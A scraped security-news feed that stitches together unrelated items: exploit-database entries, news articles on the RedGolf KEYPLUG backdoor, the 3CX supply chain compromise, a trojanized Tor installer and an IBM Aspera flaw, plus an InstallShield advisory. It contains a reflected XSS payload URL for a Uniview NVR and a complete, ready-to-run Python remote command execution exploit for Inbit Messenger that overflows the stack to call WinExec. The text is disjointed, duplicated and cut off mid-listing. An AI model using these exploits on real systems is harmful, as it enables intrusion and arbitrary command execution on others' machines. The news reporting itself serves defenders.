Uniview NVR301-04S2-P4 suffers from a cross site scripting vulnerability.

    # Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)# Author: Bleron Rrustemi# Discovery Date: 2022-11-15# Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/# Datasheet:: https://www.uniview.com/download.do?id=1761643# Device Firmware: NVR-B3801.20.15.200829# Tested Version: NVR301-04S2-P4# Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit)# Vulnerability Type: Reflected Cross-Site Scripting (XSS)# CVE: N/A  # Proof of Concept:IP=IP of the devicehttp://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script>

Uniview NVR301-04S2-P4 Cross Site Scripting

A Chinese state-sponsored threat activity group tracked as RedGolf has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG.
"RedGolf is a particularly prolific Chinese state-sponsored threat actor group that has likely been active for many years against a wide range of industries globally," Recorded Future told The Hacker News.
"The group has shown the ability to

Endpoint Security / Malware

A Chinese state-sponsored threat activity group tracked as **RedGolf** has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG.

"RedGolf is a particularly prolific Chinese state-sponsored threat actor group that has likely been active for many years against a wide range of industries globally," Recorded Future told The Hacker News.

"The group has shown the ability to rapidly weaponize newly reported vulnerabilities (e.g. Log4Shell and ProxyLogon) and has a history of developing and using a large range of custom malware families."

The use of KEYPLUG by Chinese threat actors was first disclosed by Google-owned Manidant in March 2022 in attacks targeting multiple U.S. state government networks between May 2021 and February 2022.

Then in October 2022, Malwarebytes detailed a separate set of attacks targeting government entities in Sri Lanka in early August that leveraged a novel implant dubbed DBoxAgent to deploy KEYPLUG.

Both these campaigns were attributed to Winnti (aka APT41, Barium, Bronze Atlas, or Wicked Panda), which Recorded Future said "closely overlaps" with RedGolf.

"We have not observed specific victimology as part of the latest highlighted RedGolf activity," Recorded Future said. "However, we believe this activity is likely being conducted for intelligence purposes rather than financial gain due to the overlaps with previously reported cyberespionage campaigns."

The cybersecurity firm, in addition to detecting a cluster of KEYPLUG samples and operational infrastructure (codenamed GhostWolf) used by the hacking group from at least 2021 to 2023, noted its use of other tools like Cobalt Strike and PlugX.

The GhostWolf infrastructure, for its part, consists of 42 IP addresses that function as KEYPLUG command-and-control. The adversarial collective has also been observed utilizing a mixture of both traditionally registered domains and Dynamic DNS domains, often featuring a technology theme, to act as communication points for Cobalt Strike and PlugX.

"RedGolf will continue to demonstrate a high operational tempo and rapidly weaponize vulnerabilities in external-facing corporate appliances (VPNs, firewalls, mail servers, etc.) to gain initial access to target networks," the company said.

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

"Additionally, the group will likely continue to adopt new custom malware families to add to existing tooling such as KEYPLUG."

To defend against RedGolf attacks, organizations are recommended to apply patches regularly, monitor access to external facing network devices, track and block identified command-and-control infrastructure, and configure intrusion detection or prevention systems to monitor for malware detections.

The findings come as Trend Micro revealed that it discovered more than 200 victims of Mustang Panda (aka Earth Preta) attacks as part of a far-reaching cyber espionage effort orchestrated by various sub-groups since 2022.

A majority of the cyber strikes have been detected in Asia, followed by Africa, Europe, the Middle East, Oceania, North America, and South America.

"There are strong indications of intertwined traditional intelligence tradecraft and cyber collection efforts, indicative of a highly coordinated and sophisticated cyber espionage operation," Trend Micro said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese RedGolf Group Targeting Windows and Linux Systems with KEYPLUG Backdoor

Inbit Messenger versions 4.6.0 through 4.9.0 suffer from an unauthenticated remote command execution vulnerability.

    # Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE)# Date: 11/08/2022# Exploit Author: a-rey # Vendor Homepage: http://www.inbit.com/support.html# Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html# Version: v4.6.0 - v4.9.0# Tested on: Windows XP SP3, Windows 7, Windows 10, Windows Server 2019# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md#!/usr/bin/env python3# -*- coding: utf-8 -*-import sys, socket, struct, string, argparse, loggingBANNER = """\033[0m\033[1;35m╔══════════════════════════════════════════════════════════════════════════╗║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote Command Execution \033[1;35m║╚══════════════════════════════════════════════════════════════════════════╝\033[0m by: \033[1;36m █████╗      ██████╗ ███████╗██╗   ██╗     \033[1;36m██╔══██╗     ██╔══██╗██╔════╝██║   ██║     \033[1;36m███████║ ███ ██████╔╝█████╗   ██╗ ██═╝     \033[1;36m██╔══██║     ██╔══██╗██╔══╝     ██╔╝       \033[1;36m██║  ██║     ██║  ██║███████╗   ██║        \033[1;36m╚═╝  ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝   \033[0m"""# NOTE: IAT addresses for KERNEL32!WinExec in IMS.EXE by build numberTARGETS = {  4601 : 0x005f3360,  4801 : 0x005f7364,  4901 : 0x005f7364,}# NOTE: min and max values for length of commandCMD_MIN_LEN = 10CMD_MAX_LEN = 0xfc64# NOTE: these bytes cannot be in the calculated address of WinExec to ensure overflowBAD_BYTES = b"\x3e" # >def getWinExecAddress(targetIp:str, targetPort:int) -> bytes:  # NOTE: send packet with client build number of 4601 for v4.6.0  pkt = b"<50><0><IM><ID>7</ID><a>1</a><b>4601</b><c>1</c></IM>\x00"  logging.info(f"trying to get version information from {targetIp}:{targetPort} ...")  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect((targetIp, targetPort))  s.send(pkt)  _d = s.recv(1024)  # find build tag in response  if b'<c>' not in _d:    logging.error(f"invalid version packet received: {_d}")    sys.exit(-1)  s.close()  try:    build = int(_d[_d.index(b'<c>') + 3:_d.index(b'</c>')])  except:    logging.error(f"failed to parse build number from packet: {_d}")    sys.exit(-1)  # get the IAT offset   if build not in TARGETS.keys():    logging.error(f"unexpected build number: {build}")    sys.exit(-1)  # NOTE: we need to subtract 0x38 since the vulnerable instruction is 'CALL [EAX + 0x38]'  winexec = struct.pack("<I", TARGETS[build] - 0x38)  logging.success(f"target build number is {build}")  logging.info(f"WinExec @ 0x{TARGETS[build] - 0x38:08x}")  # sanity check for bad bytes in WinExec address  for c in winexec:    if c in BAD_BYTES:      logging.error(f"found bad byte in WinExec address: 0x{TARGETS[build] - 0x38:08x}")      sys.exit(-1)  return winexecdef exploit(targetIp:str, targetPort:int, command:bytes) -> None:  # NOTE: command must be NULL terminated  command += b"\x00"  # check user command length  if len(command) < CMD_MIN_LEN:    logging.error(f"command length must be at least {CMD_MIN_LEN} characters")    sys.exit(-1)  if len(command) >= CMD_MAX_LEN:    logging.error(f"command length must be less than {CMD_MAX_LEN} characters")    sys.exit(-1)  # get WinExec address  winexec = getWinExecAddress(targetIp, targetPort)  # get a string representation of the length of the command data after the <> tag parsed by atol()  pktLen = str(len(command))  pkt  = b"<"            # start of XML tag/stack overflow  pkt += pktLen.encode() # number parsed by atol() & length of command data following '>' character  pkt += b"\x00"         # NULL terminator to force atol to ignore what comes next  # NOTE: adjust the 85 byte offset calculated that assumes a 2 byte string passed to atol()  pkt += (b"A" * (85 - (len(pktLen) - 2))) # padding up to function pointer overwrite  pkt += winexec                           # indirect function pointer we control  pkt += b">"                              # end of XML tag/stack overflow  pkt += command                           # the command set to the call to WinExec()  logging.info(f"sending payload to {targetIp}:{targetPort} ...")  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect((targetIp, targetPort))  s.send(pkt)  s.close()  logging.success("DONE")if __name__ == '__main__':  # parse arguments  parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)  parser.add_argument('-t', '--target',  help='target IP',      type=str, required=True)  parser.add_argument('-c', '--command', help='command to run', type=str, required=True)  parser.add_argument('-p', '--port',    help='target port',    type=int, required=False, default=10883)  args = parser.parse_args()  # define logger  logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO')  logging.SUCCESS = logging.CRITICAL + 1  logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')  logging.addLevelName(logging.ERROR,   '\033[0m\033[1;31mFAIL\033[0m')  logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')  logging.addLevelName(logging.INFO,    '\033[0m\033[1;36mINFO\033[0m')  logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)  # print banner  print(BANNER)  # run exploit  exploit(args.target, args.port, args.command.encode())

Inbit Messenger 4.9.0 Remote Command Execution

By Deeba Ahmed
According to cybersecurity researchers, a nation-state actor, LABYRINTH CHOLLIMA, is suspected to be behind the multi-stage attack on 3CXDesktopApp.
This is a post from HackRead.com Read the original post: Popular PABX platform, 3CX Desktop App suffers supply chain attack

SentinelOne has dubbed the attack “Smooth Operator,” while CrowdStrike suspects the involvement of a North Korean government-state actor known as LABYRINTH CHOLLIMA.

CrowdStrike and SentinelOne cybersecurity researchers identified an unusual spike in malicious activity from a single, legitimate binary, 3CX Voice Over Internet Protocol (VOIP) desktop App (3CX Desktop App).

**Campaign Details**

On March 29, 2023, CrowdStrike researchers observed malicious activity, including beaconing to attacker-operated infrastructure, deploying second-stage payloads, and, in some cases, hands-on keyboard activity.

Since the app is available for Windows, macOS, and Linux, the activity was observed on Mac and Windows systems. Mobile versions are also available for Android and iOS devices. For browsers, the app is available as an extension for Chrome, and a browser-based version is available for the Progressive Web app.

Researchers suspect the involvement of a North Korean government-state actor, LABYRINTH CHOLLIMA. CrowdStrike Intelligence sent an alert to its customers yesterday morning. On the other hand, SentinelOne started seeing an uptick in 3CX Desktop App behaviour on March 22, 2023.

It is worth mentioning that SentinelOne has dubbed the attack “Smooth Operator.” The company urges customers to ensure that prevention policies are appropriately configured and that Suspicious Processes are activated to stay protected.

**Multi-Stage Attack Scenario**

In this multi-stage attack, the malicious 3CX Desktop App installer serves as a shellcode loader that executes the shellcode from heap space and loads a DLL after removing the “MZ” at the start.

This DLL is later called through the DllGetClassObject export. At this stage, icon files are downloaded from a specific GitHub repository: (github.com/IconStorages/images).

These ICO files append Base64 data at the end, which is then decoded and used to download the final stage. In this stage, info-stealer functionality is implemented, which includes collecting system and browser data. It can collect data from Chrome, Brave, Edge, and Firefox browsers, and the collected data includes browsing history from Chrome and Places tab data from Firefox.

**What is 3CXDesktopApp**

For your information, 3CX Desktop App is a widely-used voice and video conferencing and call routing software characterized as a Private Automatic Branch Exchange (PABX) platform.

The platform is used by 600,000 companies globally and has more than 12 million active users. Companies in the automobile, manufacturing, hospitality, food & beverage, and MSP (managed information technology provider) sectors commonly use it.

It is worth noting that PBX software is an attractive target for launching supply-chain attacks, as these allow attackers to monitor organizations’ communications and alter call routing and broker connections into external voice services.

**UPDATE:**

In a subsequent update, 3CX stated that the problem seemed to stem from a bundled library that was compiled into the Windows Electron app via git, and the company is currently conducting further investigations into the matter.

1.  PyPI Packages Drop Malware in New Supply Chain Attack
2.  News Corp’s software supply chain attack & cybersecurity
3.  SolarWinds supply chain attack affected 250 organizations
4.  Access:7 Supply Chain Flaws Impact ATMs and IoT devices

Popular PABX platform, 3CX Desktop App suffers supply chain attack

3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers.
"The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls

Supply Chain / Software Security

3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers.

"The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls ICO files appended with Base64 data from GitHub and ultimately leads to a third-stage infostealer DLL," SentinelOne researchers said.

The cybersecurity firm is tracking the activity under the name **SmoothOperator**, stating the threat actor registered a massive attack infrastructure as far back as February 2022.

3CX, the company behind 3CXDesktopApp, claims to have more than 600,000 customers and 12 million users in 190 countries, some of which include well-known names like American Express, BMW, Honda, Ikea, Pepsi, and Toyota, among others.

While the 3CX PBX client is available for multiple platforms, Sophos, citing telemetry data, pointed out that the attacks observed so far are confined to the Windows Electron client of the PBX phone system.

The infection chain, in a nutshell, takes advantage of the DLL side-loading technique to load a rogue DLL (ffmpeg.dll) that's designed to retrieve an icon file (ICO) payload. The GitHub repository hosting the file has since been taken down.

The information stealer is capable of gathering system information and sensitive data stored in Google Chrome, Microsoft Edge, Brave, and Mozilla Firefox browsers.

Cybersecurity firm CrowdStrike said it suspects the attack to be linked to a North Korean nation-state actor it tracks as Labyrinth Chollima (aka Nickel Academy), a sub-cluster within the notorious Lazarus Group.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

"The malicious activity includes beaconing to actor-controlled infrastructure, deployment of second-stage payloads, and, in a small number of cases, hands-on-keyboard activity," CrowdStrike added.

In a forum post, 3CX's CEO Nick Galea said it's in the process of issuing a new build over the next few hours, and noted that Android and iOS versions are not impacted. "Unfortunately this happened because of an upstream library we use became infected," Galea said, without specifying more details.

In the interim, the company is urging its customers to uninstall the app and install it again, or alternatively use the PWA client.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

3CX Desktop App Targeted in Supply Chain Cyber Attack, Affecting Millions of Users

Categories: News
Tags: 3CX

Tags:  supply-chain

Tags:  sideload

Researchers have found that the 3CX desktop app may be compromised and used in supply chain attacks.



(Read more...)




The post 3CX desktop app used in a supply chain attack appeared first on Malwarebytes Labs.

Researchers have found that the 3CX desktop app may be compromised and used in supply chain attacks.

The 3CX Desktop App is a Voice over Internet Protocol (VoIP) type of application which is available for Windows, macOS, Linux and mobile. Many large corporations use it internally to make calls, view the status of colleagues, chat, host web conferences, and for voicemail. 3CX is a Private Branch Exchange (PBX) system, which is basically a private telephone network used within a company or organization.

The 3CX website boasts 600,000 customer companies with 12 million daily users, which might give you an idea of the possible impact a supply chain attack could have.

The discovered attack is very complex and probably has been going on for months. While attribution in these cases is always difficult, some fingers are pointing to North Korea. It is likely the attacks have been ongoing since one of the shared samples was digitally signed on March 3, 2023, with a legitimate 3CX Ltd certificate issued by DigiCert.

While it is almost certain that Windows Electron clients are affected, there is no evidence so far that any other platforms are. On the 3CX forums, users are being told that only the new version (3CX Desktop App) leads to the malware infection, because the 3CX Phone for Windows (the legacy version) is not based on the Electron Framework. Electron is an open source project that enables web developers to create desktop applications.

According to a 3CX spokesperson, this happened because of an upstream library it uses became infected.

The main executable is not malicious itself and can be downloaded from 3CX's website as part of an installation procedure or an update. The 3CXDesktopApp.exe executable, however, sideloads a malicious dynamic link library (DLL) called ffmpeg.dll.

The ffmpeg.dll in turn is used to extract an encrypted payload from d3dcompiler\_47.dll and execute it. The malware then downloads icon files hosted on GitHub that contain Base64 encoded strings appended to the end of the images, as shown below.

_Base64 strings embedded in ICO files (image courtesy of BleepingComputer)_

The d3dcompiler\_47.dll file has all the functionality of the legitimate version, with the payload appended. This warrants that it would alert users to the fact that something is wrong with their software.

While research is ongoing into the full payload, it is clear that a backdoor is created on affected systems.

**What needs to be done?**

After initially playing down the alerts on its user forums as a possible false positive, 3CX has now posted that it is working on an update.

The advice on the 3CX forums is to uninstall the app and then reinstall it, accompanied by a strong advice to install the PWA client instead.

Malwarebytes detects the malicious DDLs as Trojan.Agent.

We will keep you updated here, but as a user you might want to keep an eye on 3CX’s blog and forums to learn about new developments, and when an update is available.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

3CX desktop app used in a supply chain attack

A vulnerability has been reported in the windows installer (MSI) built with InstallScript custom action. This vulnerability may allow privilege escalation when invoked ‘repair’ of the MSI which has an InstallScript custom action.

**Summary:**

A vulnerability has been reported in the windows installer (MSI) built with InstallScript custom action. This vulnerability may allow privilege escalation when invoked ‘repair’ of the MSI which has an InstallScript custom action.

**Description:**

During MSI repair, InstallScript custom actions, if configured in the project, will be executed by extracting the InstallScript engine files to a unique folder in the user’s TEMP directory and then executed.

InstallScript engine files contain an executable named ISBEW64.EXE, which will be executed during the InstallScript code execution. So, during MSI repair, a low privilege user can invoke the operation and attain privilege escalation to “NT Authority/SYSTEM” by replacing ISBEW64.EXE in the TEMP folder with a malicious one.

Microsoft released a patch for the Windows Installer elevation of Privilege (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1661), earlier this year. It is advised to apply this patch.

**Resolution:**

Privilege escalation during InstallScript custom action execution during MSI repair, has been fixed in InstallShield 2021 R2 release. You can download the release from your Product and License Center (PLC). Note: You must have a community login with PLC access to download this fix. 

A hotfix is available for InstallShield 2020 R3 SP1 and InstallShield 2019 R3. You can download the hotfix here: InstallShield MSI Repair-Privilege Escalation Hotfix

**Workaround:**

1\. Disable the repair option while building the MSI package.

2\. Remove InstallScript custom actions or move to other type of custom actions.

**Additional Information:**

Thank you to Ronnie Salomonsen (Mandiant) for helping  identify this vulnerability and disclosing it to Revenera under a responsible disclosure process.

CVE-2021-41526: CVE-2021-41526: Privilege escalation vulnerability during MSI repair – for the MSI built with InstallScript custom action

Attackers are targeting cryptocurrency accounts belonging to users in Russia and more than 50 other countries.

Threat actors are using Trojanized installers for The Onion Router (Tor) browser to distribute clipboard-injector malware that pilfers funds from cryptocurrency accounts and transfers it to their illicit wallets.

Researchers from Kaspersky who have been tracking the activity since at least January 2022 have determined the threat actors are mostly targeting users in Russia, a nation that blocked access to Tor's official site in December 2021. Of the 16,000 instances where Kaspersky has detected the malware so far, most of them were in Russia and Eastern Europe. However, the researchers also detected the threat in more than four dozen countries so far, including the US, Germany, Netherlands, China, and the United Kingdom.

**Quiet Theft**

Kaspersky's analysis showed that the threat actors behind the campaign have, so far, siphoned out about $400,000 from crypto wallets belonging to users who downloaded the weaponized Tor installer. Almost all of the compromised accounts — more than 90% — were Bitcoin accounts, followed by LiteCoin.

"Given that we only see a fraction of the real picture, the global number of infections may well be several or even tens of times higher," Kaspersky warned in a report this week.

Clipboard injector malware, aka a clipboard hijacker, intercepts and replaces the contents of a user's clipboard with malicious code or content. This type of malware is not new, it has been around for at least a decade. Over the past few years, cybercriminals have typically used the malware to replace cryptocurrency wallet information from a user's clipboard with their own crypto information — and then transferring coins from the victim's wallet to their own.

Though seemingly straightforward, clipboard injector tools can be hard to detect and handle, Kaspersky said. They don't exhibit any of the more obvious behaviors associated with typical malware such as communicating with an external system, causing pop ups, or slowing down an infected system. They often blend in with legitimate clipboard activity and any data that the malware replaces can be hard to detect because of how frequently data in a clipboard gets overwritten in the normal course of events.

"\[Clipboard injectors\] can be silent for years, show no network activity, or any other signs of presence until the disastrous day when they replace a crypto wallet address," Kaspersky said.

**New Distribution Vector**

Threat actors so far have typically used phishing emails, malicious websites, and other malware to distribute clipboard hijackers.

The campaign to distribute it via weaponized Tor installers is a spin that Kaspersky surmised was likely inspired by Russia's move to ban access to the browser.

Tor gives individuals a way to browse the Internet anonymously by routing their traffic through a network of volunteer-run servers around the world. Frequent Tor users — apart from cybercriminals — include human rights activities, journalists, and those seeking to circumvent censorship and surveillance. Tor has previously described Russia as a country with over 300,000 daily Tor users.

According to Kaspersky, threat actors began distributing Trojanized Tor bundles to Russian-speaking users in December 2021, soon after the country's move to block access. The bundles typically consist of the original torbrowser dot exe installer with a valid Tor Project digital signature, a command-line extraction tool in the RAR archive form with a randomized name, and a password-protected RAR archive.

When a user downloads the weaponized Tor browser bundle, the original torbrowser executable runs in the foreground. In the background, it also runs the extraction tool on the password-protected RAR archive, which sets into motion a set of actions that ends with the clipboard injector malware installed on the victim system.

The authors of the malware likely have used a cracked version of Enigma, a commercially available software protector, to pack the malware and make it harder to detect.

Once installed, the "malware integrates into the chain of Windows clipboard viewers and receives a notification every time the clipboard data is changed," Kaspersky said.

If the malware detects cryptocurrency information in the clipboard, it replaces the content with an attacker-controlled address for Bitcoin or another cryptocurrency. Kaspersky researchers who analyzed various samples of the malware found each sample to contain thousands of replacement addresses making it hard for defenders to create a deny list or to trace cryptocurrency theft, the security vendor said.

The ongoing campaign is not the first time malware authors have abused Tor's popularity in Russia to target users there for cryptocurrency theft. In 2019, ESET observed a Bitcoin-stealing campaign involving a Trojanized version of the Tor browser. The security vendor's investigation showed that some of the attacker-owned Bitcoin addresses in the campaign had been active since at least 2017.

Trojan-Rigged Tor Browser Bundle Drops Malware

A vulnerability with a 9.8 CVSS rating in IBM's widely deployed Aspera Faspex offering is being actively exploited to compromise enterprises.

A critical bug in IBM's popular Aspera Faspex file transfer stack that allows arbitrary code execution is catching the eye of increasing numbers of cybercriminals, including ransomware gangs, as organizations fail to patch.

Months after IBM released a patch for the critical vulnerability, it's being exploited in the wild, researchers with Rapid7 stressed this week, noting that one of its customers was very recently compromised by the bug, tracked as CVE-2022-47986. Immediate action is needed, the researchers said.

"We strongly recommend patching on an emergency basis, without waiting for a typical patch cycle to occur," Caitlin Condon, senior manager of security research at Rapid7, warned in a blog post.

**Under the Hood of a 9.8 CVSS IBM Vulnerability**

IBM Aspera Faspex is a cloud-based file exchange application that utilizes the Fast Adaptive and Secure Protocol (FASP) to allow organizations to transfer files at higher speeds than would be achieved over ordinary TCP-based connections. The Aspera service is used by large organizations like Red Hat and the University of California, according to Enlyft, and is so lauded that it has literally won an Emmy.

The vulnerability exists in Faspex's version 4.4.2 Patch Level 1, and carries a 9.8 out of 10 on the CVSS vulnerability-severity scale.

"By sending a specially crafted obsolete API call," IBM explained in a security bulletin published on Jan. 26, an attacker could remotely deploy their own code onto any target system running Faspex.

The bug was first reported to IBM back on Oct. 6, 2022, and remedied on Dec. 8, in 4.4.2 Patch Level 2.

Exploitation activity began shortly after the patch was issued earlier this year, when the IceFire ransomware group shifted from targeting Windows to Linux systems. In doing so, it encountered a technical problem: Windows is everywhere, but Linux is most often run on servers. For that reason, they shifted to a new intrusion method for that environment: exploiting CVE-2022-47986.

In the time since, other cybercriminal outfits have pounced on this easy yet powerful vulnerability. In February, an unknown threat actor used it to deploy Buhti ransomware, after the Shadowserver Foundation picked up on live attempts.

**Why Can't Everyone Just Patch Already?**

Rarely in life do severe problems have instant remedies, yet CVE-2022-47986 is utterly amenable with a simple upgrade to Patch Level 2, or the newest Patch Level 3, released March 20, according to Condon. Why, with such a simple solution just a few clicks away, is any organization still vulnerable?

Negligence may be the answer in many cases. "Folks don't necessarily have consistent regular patch cycles," Condon tells Dark Reading. "We're seeing vulnerable software and appliances still exposed to the Internet after months and sometimes years." Indeed, as of last month, there were nearly 140 instances of Aspera Faspex exposed on the Web, she noted.

In certain cases, though, "I would not be surprised if this is difficult to patch," Condon says. "A lot of our analysis involved simply trying to set up the software and get it to work. So whether it's a complex stack or just software that is finicky when you set it up, that can also mean that it is difficult to patch."

Companies that haven't already patched, and can't do so immediately, have limited options left to protect themselves. "Putting in a couple layers of defense there would be very helpful," Condon says, and taking Aspera Faspex offline is absolutely crucial.

Ultimately, the only surefire fixes are to either patch or abandon the software outright, she adds.

"We're aware that when we say 'Hey, if you can't patch, shut it down,' that's not necessarily practical for everyone,” she explains. “So at the very least, take it off the public Internet, and put any other controls you can think of in place."

Patch Now: Cybercriminals Set Sights on Critical IBM File Transfer Bug

Rocket Software UniData versions prior to 8.2.4 build 3003 and UniVerse versions prior to 11.3.5 build 1001 or 12.2.1 build 2002 suffer from a heap-based buffer overflow in the unirpcd daemon that, if successfully exploited, can lead to remote code execution as the root user.

Tag

#windows